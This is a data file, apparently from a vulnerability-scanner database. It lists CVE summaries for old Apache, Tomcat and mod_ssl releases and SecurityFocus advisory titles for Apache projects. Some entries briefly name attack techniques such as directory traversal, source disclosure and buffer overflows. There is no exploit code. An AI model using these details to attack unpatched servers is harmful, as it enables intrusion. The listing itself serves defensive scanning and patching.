10802| [CVE-2003-0083] Apache 1.3 before 1.3.25 and Apache 2.0 before version 2.0.46 does not filter terminal escape sequences from its access logs, which could make it easier for attackers to insert those sequences into terminal emulators containing vulnerabilities related to escape sequences, a different vulnerability than CVE-2003-0020.
10803| [CVE-2003-0020] Apache does not filter terminal escape sequences from its error logs, which could make it easier for attackers to insert those sequences into terminal emulators containing vulnerabilities related to escape sequences.
10804| [CVE-2003-0017] Apache 2.0 before 2.0.44 on Windows platforms allows remote attackers to obtain certain files via an HTTP request that ends in certain illegal characters such as ">", which causes a different filename to be processed and served.
10805| [CVE-2003-0016] Apache before 2.0.44, when running on unpatched Windows 9x and Me operating systems, allows remote attackers to cause a denial of service or execute arbitrary code via an HTTP request containing MS-DOS device names.
10806| [CVE-2002-2310] ClickCartPro 4.0 stores the admin_user.db data file under the web document root with insufficient access control on servers other than Apache, which allows remote attackers to obtain usernames and passwords.
10807| [CVE-2002-2309] php.exe in PHP 3.0 through 4.2.2, when running on Apache, does not terminate properly, which allows remote attackers to cause a denial of service via a direct request without arguments.
10808| [CVE-2002-2272] Tomcat 4.0 through 4.1.12, using mod_jk 1.2.1 module on Apache 1.3 through 1.3.27, allows remote attackers to cause a denial of service (desynchronized communications) via an HTTP GET request with a Transfer-Encoding chunked field with invalid values.
10809| [CVE-2002-2103] Apache before 1.3.24, when writing to the log file, records a spoofed hostname from the reverse lookup of an IP address, even when a double-reverse lookup fails, which allows remote attackers to hide the original source of activities.
10810| [CVE-2002-2029] PHP, when installed on Windows with Apache and ScriptAlias for /php/ set to c:/php/, allows remote attackers to read arbitrary files and possibly execute arbitrary programs via an HTTP request for php.exe with a filename in the query string.
10811| [CVE-2002-2012] Unknown vulnerability in Apache 1.3.19 running on HP Secure OS for Linux 1.0 allows remote attackers to cause "unexpected results" via an HTTP request.
10812| [CVE-2002-2009] Apache Tomcat 4.0.1 allows remote attackers to obtain the web root path via HTTP requests for JSP files preceded by (1) +/, (2) >/, (3) </, and (4) %20/, which leaks the pathname in an error message.
10813| [CVE-2002-2008] Apache Tomcat 4.0.3 for Windows allows remote attackers to obtain the web root path via an HTTP request for a resource that does not exist, such as lpt9, which leaks the information in an error message.
10814| [CVE-2002-2007] The default installations of Apache Tomcat 3.2.3 and 3.2.4 allows remote attackers to obtain sensitive system information such as directory listings and web root path, via erroneous HTTP requests for Java Server Pages (JSP) in the (1) test/jsp, (2) samples/jsp and (3) examples/jsp directories, or the (4) test/realPath.jsp servlet, which leaks pathnames in error messages.
10815| [CVE-2002-2006] The default installation of Apache Tomcat 4.0 through 4.1 and 3.0 through 3.3.1 allows remote attackers to obtain the installation path and other sensitive system information via the (1) SnoopServlet or (2) TroubleShooter example servlets.
10816| [CVE-2002-1895] The servlet engine in Jakarta Apache Tomcat 3.3 and 4.0.4, when using IIS and the ajp1.3 connector, allows remote attackers to cause a denial of service (crash) via a large number of HTTP GET requests for an MS-DOS device such as AUX, LPT1, CON, or PRN.
10817| [CVE-2002-1850] mod_cgi in Apache 2.0.39 and 2.0.40 allows local users and possibly remote attackers to cause a denial of service (hang and memory consumption) by causing a CGI script to send a large amount of data to stderr, which results in a read/write deadlock between httpd and the CGI script.
10818| [CVE-2002-1793] HTTP Server mod_ssl module running on HP-UX 11.04 with Virtualvault OS (VVOS) 4.5 through 4.6 closes the connection when the Apache server times out during an SSL request, which may allow attackers to cause a denial of service.
10819| [CVE-2002-1658] Buffer overflow in htdigest in Apache 1.3.26 and 1.3.27 may allow attackers to execute arbitrary code via a long user argument. NOTE: since htdigest is normally only locally accessible and not setuid or setgid, there are few attack vectors which would lead to an escalation of privileges, unless htdigest is executed from a CGI program. Therefore this may not be a vulnerability.
10820| [CVE-2002-1635] The Apache configuration file (httpd.conf) in Oracle 9i Application Server (9iAS) uses a Location alias for /perl directory instead of a ScriptAlias, which allows remote attackers to read the source code of arbitrary CGI files via a URL containing the /perl directory instead of /cgi-bin.
10821| [CVE-2002-1593] mod_dav in Apache before 2.0.42 does not properly handle versioning hooks, which may allow remote attackers to kill a child process via a null dereference and cause a denial of service (CPU consumption) in a preforked multi-processing module.
10822| [CVE-2002-1592] The ap_log_rerror function in Apache 2.0 through 2.035, when a CGI application encounters an error, sends error messages to the client that include the full path for the server, which allows remote attackers to obtain sensitive information.
10823| [CVE-2002-1567] Cross-site scripting (XSS) vulnerability in Apache Tomcat 4.1 allows remote attackers to execute arbitrary web script and steal cookies via a URL with encoded newlines followed by a request to a .jsp file whose name contains the script.
10824| [CVE-2002-1394] Apache Tomcat 4.0.5 and earlier, when using both the invoker servlet and the default servlet, allows remote attackers to read source code for server files or bypass certain protections, a variant of CAN-2002-1148.
10825| [CVE-2002-1233] A regression error in the Debian distributions of the apache-ssl package (before 1.3.9 on Debian 2.2, and before 1.3.26 on Debian 3.0), for Apache 1.3.27 and earlier, allows local users to read or modify the Apache password file via a symlink attack on temporary files when the administrator runs (1) htpasswd or (2) htdigest, a re-introduction of a vulnerability that was originally identified and addressed by CVE-2001-0131.
10826| [CVE-2002-1157] Cross-site scripting vulnerability in the mod_ssl Apache module 2.8.9 and earlier, when UseCanonicalName is off and wildcard DNS is enabled, allows remote attackers to execute script as other web site visitors, via the server name in an HTTPS response on the SSL port, which is used in a self-referencing URL, a different vulnerability than CAN-2002-0840.
10827| [CVE-2002-1156] Apache 2.0.42 allows remote attackers to view the source code of a CGI script via a POST request to a directory with both WebDAV and CGI enabled.
10828| [CVE-2002-1148] The default servlet (org.apache.catalina.servlets.DefaultServlet) in Tomcat 4.0.4 and 4.1.10 and earlier allows remote attackers to read source code for server files via a direct request to the servlet.
10829| [CVE-2002-0935] Apache Tomcat 4.0.3, and possibly other versions before 4.1.3 beta, allows remote attackers to cause a denial of service (resource exhaustion) via a large number of requests to the server with null characters, which causes the working threads to hang.
10830| [CVE-2002-0843] Buffer overflows in the ApacheBench benchmark support program (ab.c) in Apache before 1.3.27, and Apache 2.x before 2.0.43, allow a malicious web server to cause a denial of service and possibly execute arbitrary code via a long response.
10831| [CVE-2002-0840] Cross-site scripting (XSS) vulnerability in the default error page of Apache 2.0 before 2.0.43, and 1.3.x up to 1.3.26, when UseCanonicalName is "Off" and support for wildcard DNS is present, allows remote attackers to execute script as other web page visitors via the Host: header, a different vulnerability than CAN-2002-1157.
10832| [CVE-2002-0839] The shared memory scoreboard in the HTTP daemon for Apache 1.3.x before 1.3.27 allows any user running as the Apache UID to send a SIGUSR1 signal to any process as root, resulting in a denial of service (process kill) or possibly other behaviors that would not normally be allowed, by modifying the parent[].pid and parent[].last_rtime segments in the scoreboard.
10833| [CVE-2002-0682] Cross-site scripting vulnerability in Apache Tomcat 4.0.3 allows remote attackers to execute script as other web users via script in a URL with the /servlet/ mapping, which does not filter the script when an exception is thrown by the servlet.
10834| [CVE-2002-0661] Directory traversal vulnerability in Apache 2.0 through 2.0.39 on Windows, OS2, and Netware allows remote attackers to read arbitrary files and execute commands via .. (dot dot) sequences containing \ (backslash) characters.
10835| [CVE-2002-0658] OSSP mm library (libmm) before 1.2.0 allows the local Apache user to gain privileges via temporary files, possibly via a symbolic link attack.
10836| [CVE-2002-0654] Apache 2.0 through 2.0.39 on Windows, OS2, and Netware allows remote attackers to determine the full pathname of the server via (1) a request for a .var file, which leaks the pathname in the resulting error message, or (2) via an error message that occurs when a script (child process) cannot be invoked.
10837| [CVE-2002-0653] Off-by-one buffer overflow in the ssl_compat_directive function, as called by the rewrite_command hook for mod_ssl Apache module 2.8.9 and earlier, allows local users to execute arbitrary code as the Apache server user via .htaccess files with long entries.
10838| [CVE-2002-0513] The PHP administration script in popper_mod 1.2.1 and earlier relies on Apache .htaccess authentication, which allows remote attackers to gain privileges if the script is not appropriately configured by the administrator.
10839| [CVE-2002-0493] Apache Tomcat may be started without proper security settings if errors are encountered while reading the web.xml file, which could allow attackers to bypass intended restrictions.
10840| [CVE-2002-0392] Apache 1.3 through 1.3.24, and Apache 2.0 through 2.0.36, allows remote attackers to cause a denial of service and possibly execute arbitrary code via a chunk-encoded HTTP request that causes Apache to use an incorrect size.
10841| [CVE-2002-0259] InstantServers MiniPortal 1.1.5 and earlier stores sensitive login and account data in plaintext in (1) .pwd files in the miniportal/apache directory, or (2) mplog.txt, which could allow local users to gain privileges.
10842| [CVE-2002-0249] PHP for Windows, when installed on Apache 2.0.28 beta as a standalone CGI module, allows remote attackers to obtain the physical path of the php.exe via a request with malformed arguments such as /123, which leaks the pathname in the error message.
10843| [CVE-2002-0240] PHP, when installed with Apache and configured to search for index.php as a default web page, allows remote attackers to obtain the full pathname of the server via the HTTP OPTIONS method, which reveals the pathname in the resulting error message.
10844| [CVE-2002-0082] The dbm and shm session cache code in mod_ssl before 2.8.7-1.3.23, and Apache-SSL before 1.3.22+1.46, does not properly initialize memory using the i2d_SSL_SESSION function, which allows remote attackers to use a buffer overflow to execute arbitrary code via a large client certificate that is signed by a trusted Certificate Authority (CA), which produces a large serialized session.
10845| [CVE-2002-0061] Apache for Win32 before 1.3.24, and 2.0.x before 2.0.34-beta, allows remote attackers to execute arbitrary commands via shell metacharacters (a | pipe character) provided as arguments to batch (.bat) or .cmd scripts, which are sent unfiltered to the shell interpreter, typically cmd.exe.
10846| [CVE-2001-1556] The log files in Apache web server contain information directly supplied by clients and does not filter or quote control characters, which could allow remote attackers to hide HTTP requests and spoof source IP addresses when logs are viewed with UNIX programs such as cat, tail, and grep.
10847| [CVE-2001-1534] mod_usertrack in Apache 1.3.11 through 1.3.20 generates session ID's using predictable information including host IP address, system time and server process ID, which allows local users to obtain session ID's and bypass authentication when these session ID's are used for authentication.
10848| [CVE-2001-1510] Allaire JRun 2.3.3, 3.0 and 3.1 running on IIS 4.0 and 5.0, iPlanet, Apache, JRun web server (JWS), and possibly other web servers allows remote attackers to read arbitrary files and directories by appending (1) "%3f.jsp", (2) "?.jsp" or (3) "?" to the requested URL.
10849| [CVE-2001-1449] The default installation of Apache before 1.3.19 on Mandrake Linux 7.1 through 8.0 and Linux Corporate Server 1.0.1 allows remote attackers to list the directory index of arbitrary web directories.
10850| [CVE-2001-1385] The Apache module for PHP 4.0.0 through PHP 4.0.4, when disabled with the 'engine = off' option for a virtual host, may disable PHP for other virtual hosts, which could cause Apache to serve the source code of PHP scripts.
10851| [CVE-2001-1342] Apache before 1.3.20 on Windows and OS/2 systems allows remote attackers to cause a denial of service (GPF) via an HTTP request for a URI that contains a large number of / (slash) or other characters, which causes certain functions to dereference a null pointer.
10852| [CVE-2001-1217] Directory traversal vulnerability in PL/SQL Apache module in Oracle 9i Application Server allows remote attackers to access sensitive information via a double encoded URL with .. (dot dot) sequences.
10853| [CVE-2001-1216] Buffer overflow in PL/SQL Apache module in Oracle 9i Application Server allows remote attackers to execute arbitrary code via a long request for a help page.
10854| [CVE-2001-1072] Apache with mod_rewrite enabled on most UNIX systems allows remote attackers to bypass RewriteRules by inserting extra / (slash) characters into the requested path, which causes the regular expression in the RewriteRule to fail.
10855| [CVE-2001-1013] Apache on Red Hat Linux with the UserDir directive enabled generates different error codes when a username exists and there is no public_html directory and when the username does not exist, which could allow remote attackers to determine valid usernames on the server.
10856| [CVE-2001-0925] The default installation of Apache before 1.3.19 allows remote attackers to list directories instead of the multiview index.html file via an HTTP request for a path that contains many / (slash) characters, which causes the path to be mishandled by (1) mod_negotiation, (2) mod_dir, or (3) mod_autoindex.
10857| [CVE-2001-0829] A cross-site scripting vulnerability in Apache Tomcat 3.2.1 allows a malicious webmaster to embed Javascript in a request for a .JSP file, which causes the Javascript to be inserted into an error message.
10858| [CVE-2001-0766] Apache on MacOS X Client 10.0.3 with the HFS+ file system allows remote attackers to bypass access restrictions via a URL that contains some characters whose case is not matched by Apache's filters.
10859| [CVE-2001-0731] Apache 1.3.20 with Multiviews enabled allows remote attackers to view directory contents and bypass the index page via a URL containing the "M=D" query string.
10860| [CVE-2001-0730] split-logfile in Apache 1.3.20 allows remote attackers to overwrite arbitrary files that end in the .log extension via an HTTP request with a / (slash) in the Host: header.
10861| [CVE-2001-0729] Apache 1.3.20 on Windows servers allows remote attackers to bypass the default index page and list directory contents via a URL with a large number of / (slash) characters.
10862| [CVE-2001-0590] Apache Software Foundation Tomcat Servlet prior to 3.2.2 allows a remote attacker to read the source code to arbitrary 'jsp' files via a malformed URL request which does not end with an HTTP protocol specification (i.e. HTTP/1.0).
10863| [CVE-2001-0131] htpasswd and htdigest in Apache 2.0a9, 1.3.14, and others allows local users to overwrite arbitrary files via a symlink attack.
10864| [CVE-2001-0108] PHP Apache module 4.0.4 and earlier allows remote attackers to bypass .htaccess access restrictions via a malformed HTTP request on an unrestricted page that causes PHP to use those access controls on the next page that is requested.
10865| [CVE-2001-0042] PHP 3.x (PHP3) on Apache 1.3.6 allows remote attackers to read arbitrary files via a modified .. (dot dot) attack containing "%5c" (encoded backslash) sequences.
10866| [CVE-2000-1247] The default configuration of the jserv-status handler in jserv.conf in Apache JServ 1.1.2 includes an "allow from 127.0.0.1" line, which allows local users to discover JDBC passwords or other sensitive information via a direct request to the jserv/ URI.
10867| [CVE-2000-1210] Directory traversal vulnerability in source.jsp of Apache Tomcat before 3.1 allows remote attackers to read arbitrary files via a .. (dot dot) in the argument to source.jsp.
10868| [CVE-2000-1206] Vulnerability in Apache httpd before 1.3.11, when configured for mass virtual hosting using mod_rewrite, or mod_vhost_alias in Apache 1.3.9, allows remote attackers to retrieve arbitrary files.
10869| [CVE-2000-1205] Cross site scripting vulnerabilities in Apache 1.3.0 through 1.3.11 allow remote attackers to execute script as other web site visitors via (1) the printenv CGI (printenv.pl), which does not encode its output, (2) pages generated by the ap_send_error_response function such as a default 404, which does not add an explicit charset, or (3) various messages that are generated by certain Apache modules or core code. NOTE: the printenv issue might still exist for web browsers that can render text/plain content types as HTML, such as Internet Explorer, but CVE regards this as a design limitation of those browsers, not Apache. The printenv.pl/acuparam vector, disclosed on 20070724, is one such variant.
10870| [CVE-2000-1204] Vulnerability in the mod_vhost_alias virtual hosting module for Apache 1.3.9, 1.3.11 and 1.3.12 allows remote attackers to obtain the source code for CGI programs if the cgi-bin directory is under the document root.
10871| [CVE-2000-1168] IBM HTTP Server 1.3.6 (based on Apache) allows remote attackers to cause a denial of service and possibly execute arbitrary commands via a long GET request.
10872| [CVE-2000-1016] The default configuration of Apache (httpd.conf) on SuSE 6.4 includes an alias for the /usr/doc directory, which allows remote attackers to read package documentation and obtain system configuration information via an HTTP request for the /doc/packages URL.
10873| [CVE-2000-0913] mod_rewrite in Apache 1.3.12 and earlier allows remote attackers to read arbitrary files if a RewriteRule directive is expanded to include a filename whose name contains a regular expression.
10874| [CVE-2000-0883] The default configuration of mod_perl for Apache as installed on Mandrake Linux 6.1 through 7.1 sets the /perl/ directory to be browseable, which allows remote attackers to list the contents of that directory.
10875| [CVE-2000-0869] The default configuration of Apache 1.3.12 in SuSE Linux 6.4 enables WebDAV, which allows remote attackers to list arbitrary directories via the PROPFIND HTTP request method.
10876| [CVE-2000-0868] The default configuration of Apache 1.3.12 in SuSE Linux 6.4 allows remote attackers to read source code for CGI scripts by replacing the /cgi-bin/ in the requested URL with /cgi-bin-sdb/.
10877| [CVE-2000-0791] Trustix installs the httpsd program for Apache-SSL with world-writeable permissions, which allows local users to replace it with a Trojan horse.
10878| [CVE-2000-0760] The Snoop servlet in Jakarta Tomcat 3.1 and 3.0 under Apache reveals sensitive system information when a remote attacker requests a nonexistent URL with a .snp extension.
10879| [CVE-2000-0759] Jakarta Tomcat 3.1 under Apache reveals physical path information when a remote attacker requests a URL that does not exist, which generates an error message that includes the physical path.
10880| [CVE-2000-0628] The source.asp example script in the Apache ASP module Apache::ASP 1.93 and earlier allows remote attackers to modify files.
10881| [CVE-2000-0505] The Apache 1.3.x HTTP server for Windows platforms allows remote attackers to list directory contents by requesting a URL containing a large number of / characters.
10882| [CVE-1999-1412] A possible interaction between Apple MacOS X release 1.0 and Apache HTTP server allows remote attackers to cause a denial of service (crash) via a flood of HTTP GET requests to CGI programs, which generates a large number of processes.
10883| [CVE-1999-1293] mod_proxy in Apache 1.2.5 and earlier allows remote attackers to cause a denial of service via malformed FTP commands, which causes Apache to dump core.
10884| [CVE-1999-1237] Multiple buffer overflows in smbvalid/smbval SMB authentication library, as used in Apache::AuthenSmb and possibly other modules, allows remote attackers to execute arbitrary commands via (1) a long username, (2) a long password, and (3) other unspecified methods.
10885| [CVE-1999-1199] Apache WWW server 1.3.1 and earlier allows remote attackers to cause a denial of service (resource exhaustion) via a large number of MIME headers with the same name, aka the "sioux" vulnerability.
10886| [CVE-1999-1053] guestbook.pl cleanses user-inserted SSI commands by removing text between "<!--" and "-->" separators, which allows remote attackers to execute arbitrary commands when guestbook.pl is run on Apache 1.3.9 and possibly other versions, since Apache allows other closing sequences besides "-->".
10887| [CVE-1999-0926] Apache allows remote attackers to conduct a denial of service via a large number of MIME headers.
10888| [CVE-1999-0678] A default configuration of Apache on Debian GNU/Linux sets the ServerRoot to /usr/doc, which allows remote users to read documentation files for the entire server.
10889| [CVE-1999-0448] IIS 4.0 and Apache log HTTP request methods, regardless of how long they are, allowing a remote attacker to hide the URL they really request.
10890| [CVE-1999-0289] The Apache web server for Win32 may provide access to restricted files when a . (dot) is appended to a requested URL.
10891| [CVE-1999-0236] ScriptAlias directory in NCSA and Apache httpd allowed attackers to read CGI programs.
10892| [CVE-1999-0107] Buffer overflow in Apache 1.2.5 and earlier allows a remote attacker to cause a denial of service with a large number of GET requests containing a large number of / characters.
10893| [CVE-1999-0071] Apache httpd cookie buffer overflow for versions 1.1.1 and earlier.
10894|
10895| SecurityFocus - https://www.securityfocus.com/bid/:
10896| [104554] Apache HBase CVE-2018-8025 Security Bypass Vulnerability
10897| [104465] Apache Geode CVE-2017-15695 Remote Code Execution Vulnerability
10898| [104418] Apache Storm CVE-2018-8008 Arbitrary File Write Vulnerability
10899| [104399] Apache Storm CVE-2018-1332 User Impersonation Vulnerability
10900| [104348] Apache UIMA CVE-2017-15691 XML External Entity Injection Vulnerability
10901| [104313] Apache NiFi XML External Entity Injection and Denial of Service Vulnerability
10902| [104259] Apache Geode CVE-2017-12622 Authorization Bypass Vulnerability
10903| [104257] Apache Sling XSS Protection API CVE-2017-15717 Cross Site Scripting Vulnerability
10904| [104253] Apache ZooKeeper CVE-2018-8012 Security Bypass Vulnerability
10905| [104252] Apache Batik CVE-2018-8013 Information Disclosure Vulnerability
10906| [104239] Apache Solr CVE-2018-8010 XML External Entity Multiple Information Disclosure Vulnerabilities
10907| [104215] Apache ORC CVE-2018-8015 Denial of Service Vulnerability
10908| [104203] Apache Tomcat CVE-2018-8014 Security Bypass Vulnerability
10909| [104161] Apache Ambari CVE-2018-8003 Directory Traversal Vulnerability
10910| [104140] Apache Derby CVE-2018-1313 Security Bypass Vulnerability
10911| [104135] Apache Tika CVE-2018-1338 Denial of Service Vulnerability
10912| [104008] Apache Fineract CVE-2018-1291 SQL Injection Vulnerability
10913| [104007] Apache Fineract CVE-2018-1292 SQL Injection Vulnerability
10914| [104005] Apache Fineract CVE-2018-1289 SQL Injection Vulnerability
10915| [104001] Apache Tika CVE-2018-1335 Remote Command Injection Vulnerability
10916| [103975] Apache Fineract CVE-2018-1290 SQL Injection Vulnerability
10917| [103974] Apache Solr CVE-2018-1308 XML External Entity Injection Vulnerability
10918| [103772] Apache Traffic Server CVE-2017-7671 Denial of Service Vulnerability
10919| [103770] Apache Traffic Server CVE-2017-5660 Security Bypass Vulnerability
10920| [103751] Apache Hive CVE-2018-1282 SQL Injection Vulnerability
10921| [103750] Apache Hive CVE-2018-1284 Security Bypass Vulnerability
10922| [103692] Apache Ignite CVE-2018-1295 Arbitrary Code Execution Vulnerability
10923| [103528] Apache HTTP Server CVE-2018-1302 Denial of Service Vulnerability
10924| [103525] Apache HTTP Server CVE-2017-15715 Remote Security Bypass Vulnerability
10925| [103524] Apache HTTP Server CVE-2018-1312 Remote Security Bypass Vulnerability
10926| [103522] Apache HTTP Server CVE-2018-1303 Denial of Service Vulnerability
10927| [103520] Apache HTTP Server CVE-2018-1283 Remote Security Vulnerability
10928| [103516] Apache Struts CVE-2018-1327 Denial of Service Vulnerability
10929| [103515] Apache HTTP Server CVE-2018-1301 Denial of Service Vulnerability
10930| [103512] Apache HTTP Server CVE-2017-15710 Denial of Service Vulnerability
10931| [103508] Apache Syncope CVE-2018-1321 Multiple Remote Code Execution Vulnerabilities
10932| [103507] Apache Syncope CVE-2018-1322 Multiple Information Disclosure Vulnerabilities
10933| [103490] Apache Commons Compress CVE-2018-1324 Multiple Denial Of Service Vulnerabilities
10934| [103434] APACHE Allura CVE-2018-1319 HTTP Response Splitting Vulnerability
10935| [103389] Apache Tomcat JK Connector CVE-2018-1323 Directory Traversal Vulnerability
10936| [103222] Apache CloudStack CVE-2013-4317 Information Disclosure Vulnerability
10937| [103219] Apache Xerces-C CVE-2017-12627 Null Pointer Dereference Denial of Service Vulnerability
10938| [103206] Apache Geode CVE-2017-15693 Remote Code Execution Vulnerability
10939| [103205] Apache Geode CVE-2017-15692 Remote Code Execution Vulnerability
10940| [103170] Apache Tomcat CVE-2018-1304 Security Bypass Vulnerability
10941| [103144] Apache Tomcat CVE-2018-1305 Security Bypass Vulnerability
10942| [103102] Apache Oozie CVE-2017-15712 Information Disclosure Vulnerability
10943| [103098] Apache Karaf CVE-2016-8750 LDAP Injection Vulnerability
10944| [103069] Apache Tomcat CVE-2017-15706 Remote Security Weakness
10945| [103068] Apache JMeter CVE-2018-1287 Security Bypass Vulnerability
10946| [103067] Apache Qpid Dispatch Router 'router_core/connections.c' Denial of Service Vulnerability
10947| [103036] Apache CouchDB CVE-2017-12636 Remote Code Execution Vulnerability
10948| [103025] Apache Thrift CVE-2016-5397 Remote Command Injection Vulnerability
10949| [102879] Apache POI CVE-2017-12626 Multiple Denial of Service Vulnerabilities
10950| [102842] Apache NiFi CVE-2017-12632 Host Header Injection Vulnerability
10951| [102815] Apache NiFi CVE-2017-15697 Multiple Cross Site Scripting Vulnerabilities
10952| [102488] Apache Geode CVE-2017-9795 Remote Code Execution Vulnerability
10953| [102229] Apache Sling CVE-2017-15700 Information Disclosure Vulnerability
10954| [102226] Apache Drill CVE-2017-12630 Cross Site Scripting Vulnerability
10955| [102154] Multiple Apache Products CVE-2017-15708 Remote Code Execution Vulnerability
10956| [102127] Apache CXF Fediz CVE-2017-12631 Multiple Cross Site Request Forgery Vulnerabilities
10957| [102041] Apache Qpid Broker-J CVE-2017-15701 Denial of Service Vulnerability
10958| [102040] Apache Qpid Broker CVE-2017-15702 Security Weakness
10959| [102021] Apache Struts CVE-2017-15707 Denial of Service Vulnerability
10960| [101980] EMC RSA Authentication Agent for Web: Apache Web Server Authentication Bypass Vulnerability
| [101876] Apache Camel CVE-2017-12634 Deserialization Remote Code Execution Vulnerability
| [101874] Apache Camel CVE-2017-12633 Deserialization Remote Code Execution Vulnerability
| [101872] Apache Karaf CVE-2014-0219 Local Denial of Service Vulnerability
| [101868] Apache CouchDB CVE-2017-12635 Remote Privilege Escalation Vulnerability
| [101859] Apache CXF CVE-2017-12624 Denial of Service Vulnerability
| [101844] Apache Sling Servlets Post CVE-2017-11296 Cross Site Scripting Vulnerability
| [101686] Apache Hive CVE-2017-12625 Information Disclosure Vulnerability
| [101644] Apache Wicket CVE-2012-5636 Cross Site Scripting Vulnerability
| [101631] Apache Traffic Server CVE-2015-3249 Multiple Remote Code Execution Vulnerabilities
| [101630] Apache Traffic Server CVE-2014-3624 Access Bypass Vulnerability
| [101625] Apache jUDDI CVE-2009-1197 Security Bypass Vulnerability
| [101623] Apache jUDDI CVE-2009-1198 Cross Site Scripting Vulnerability
| [101620] Apache Subversion 'libsvn_fs_fs/fs_fs.c' Denial of Service Vulnerability
| [101585] Apache OpenOffice Multiple Remote Code Execution Vulnerabilities
| [101577] Apache Wicket CVE-2016-6806 Cross Site Request Forgery Vulnerability
| [101575] Apache Wicket CVE-2014-0043 Information Disclosure Vulnerability
| [101570] Apache Geode CVE-2017-9797 Information Disclosure Vulnerability
| [101562] Apache Derby CVE-2010-2232 Arbitrary File Overwrite Vulnerability
| [101560] Apache Portable Runtime Utility CVE-2017-12613 Multiple Information Disclosure Vulnerabilities
| [101558] Apache Portable Runtime Utility Local Out-of-Bounds Read Denial of Service Vulnerability
| [101532] Apache James CVE-2017-12628 Arbitrary Command Execution Vulnerability
| [101516] Apache HTTP Server CVE-2017-12171 Security Bypass Vulnerability
| [101261] Apache Solr/Lucene CVE-2017-12629 Information Disclosure and Remote Code Execution Vulnerabilities
| [101230] Apache Roller CVE-2014-0030 XML External Entity Injection Vulnerability
| [101173] Apache IMPALA CVE-2017-9792 Information Disclosure Vulnerability
| [101052] Apache Commons Jelly CVE-2017-12621 Security Bypass Vulnerability
| [101027] Apache Mesos CVE-2017-7687 Denial of Service Vulnerability
| [101023] Apache Mesos CVE-2017-9790 Denial of Service Vulnerability
| [100954] Apache Tomcat CVE-2017-12617 Incomplete Fix Remote Code Execution Vulnerability
| [100946] Apache Wicket CVE-2014-7808 Cross Site Request Forgery Vulnerability
| [100901] Apache Tomcat CVE-2017-12615 Remote Code Execution Vulnerability
| [100897] Apache Tomcat CVE-2017-12616 Information Disclosure Vulnerability
| [100880] Apache Directory LDAP API CVE-2015-3250 Unspecified Information Disclosure Vulnerability
| [100872] Apache HTTP Server CVE-2017-9798 Information Disclosure Vulnerability
| [100870] Apache Solr CVE-2017-9803 Remote Privilege Escalation Vulnerability
| [100859] puppetlabs-apache CVE-2017-2299 Information Disclosure Vulnerability
| [100829] Apache Struts CVE-2017-12611 Remote Code Execution Vulnerability
| [100823] Apache Spark CVE-2017-12612 Deserialization Remote Code Execution Vulnerability
| [100612] Apache Struts CVE-2017-9804 Incomplete Fix Denial of Service Vulnerability
| [100611] Apache Struts CVE-2017-9793 Denial of Service Vulnerability
| [100609] Apache Struts CVE-2017-9805 Remote Code Execution Vulnerability
| [100587] Apache Atlas CVE-2017-3155 Cross Frame Scripting Vulnerability
| [100581] Apache Atlas CVE-2017-3154 Information Disclosure Vulnerability
| [100578] Apache Atlas CVE-2017-3153 Cross Site Scripting Vulnerability
| [100577] Apache Atlas CVE-2017-3152 Cross Site Scripting Vulnerability
| [100547] Apache Atlas CVE-2017-3151 HTML Injection Vulnerability
| [100536] Apache Atlas CVE-2017-3150 Cross Site Scripting Vulnerability
| [100449] Apache Pony Mail CVE-2016-4460 Authentication Bypass Vulnerability
| [100447] Apache2Triad Multiple Security Vulnerabilities
| [100284] Apache Sling Servlets Post CVE-2017-9802 Cross Site Scripting Vulnerability
| [100280] Apache Tomcat CVE-2017-7674 Security Bypass Vulnerability
| [100259] Apache Subversion CVE-2017-9800 Remote Command Execution Vulnerability
| [100256] Apache Tomcat CVE-2017-7675 Directory Traversal Vulnerability
| [100235] Apache Storm CVE-2017-9799 Remote Code Execution Vulnerability
| [100082] Apache Commons Email CVE-2017-9801 SMTP Header Injection Vulnerability
| [99873] Apache Sling XSS Protection API CVE-2016-6798 XML External Entity Injection Vulnerability
| [99870] Apache Sling API CVE-2016-5394 Cross Site Scripting Vulnerability
| [99603] Apache Spark CVE-2017-7678 Cross Site Scripting Vulnerability
| [99592] Apache OpenMeetings CVE-2017-7685 Security Bypass Vulnerability
| [99587] Apache OpenMeetings CVE-2017-7673 Security Bypass Vulnerability
| [99586] Apache OpenMeetings CVE-2017-7688 Security Bypass Vulnerability
| [99584] Apache OpenMeetings CVE-2017-7684 Denial of Service Vulnerability
| [99577] Apache OpenMeetings CVE-2017-7663 Cross Site Scripting Vulnerability
| [99576] Apache OpenMeetings CVE-2017-7664 XML External Entity Injection Vulnerability
| [99569] Apache HTTP Server CVE-2017-9788 Memory Corruption Vulnerability
| [99568] Apache HTTP Server CVE-2017-9789 Denial of Service Vulnerability
| [99563] Apache Struts CVE-2017-7672 Denial of Service Vulnerability
| [99562] Apache Struts Spring AOP Functionality Denial of Service Vulnerability
| [99509] Apache Impala CVE-2017-5652 Information Disclosure Vulnerability
| [99508] Apache IMPALA CVE-2017-5640 Authentication Bypass Vulnerability
| [99486] Apache Traffic Control CVE-2017-7670 Denial of Service Vulnerability
| [99485] Apache Solr CVE-2017-7660 Security Bypass Vulnerability
| [99484] Apache Struts CVE-2017-9791 Remote Code Execution Vulnerability
| [99292] Apache Ignite CVE-2017-7686 Information Disclosure Vulnerability
| [99170] Apache HTTP Server CVE-2017-7679 Buffer Overflow Vulnerability
| [99137] Apache HTTP Server CVE-2017-7668 Denial of Service Vulnerability
| [99135] Apache HTTP Server CVE-2017-3167 Authentication Bypass Vulnerability
| [99134] Apache HTTP Server CVE-2017-3169 Denial of Service Vulnerability
| [99132] Apache HTTP Server CVE-2017-7659 Denial of Service Vulnerability
| [99112] Apache Thrift CVE-2015-3254 Denial of Service Vulnerability
| [99067] Apache Ranger CVE-2016-8751 HTML Injection Vulnerability
| [99018] Apache NiFi CVE-2017-7667 Cross Frame Scripting Vulnerability
| [99009] Apache NiFi CVE-2017-7665 Cross Site Scripting Vulnerability
| [98961] Apache Ranger CVE-2017-7677 Security Bypass Vulnerability
| [98958] Apache Ranger CVE-2017-7676 Security Bypass Vulnerability
| [98888] Apache Tomcat CVE-2017-5664 Security Bypass Vulnerability
| [98814] Apache Zookeeper CVE-2017-5637 Denial of Service Vulnerability
| [98795] Apache Hadoop CVE-2017-7669 Remote Privilege Escalation Vulnerability
| [98739] Apache Knox CVE-2017-5646 User Impersonation Vulnerability
| [98669] Apache Hive CVE-2016-3083 Security Bypass Vulnerability
| [98646] Apache Atlas CVE-2016-8752 Information Disclosure Vulnerability
| [98570] Apache Archiva CVE-2017-5657 Multiple Cross-Site Request Forgery Vulnerabilities
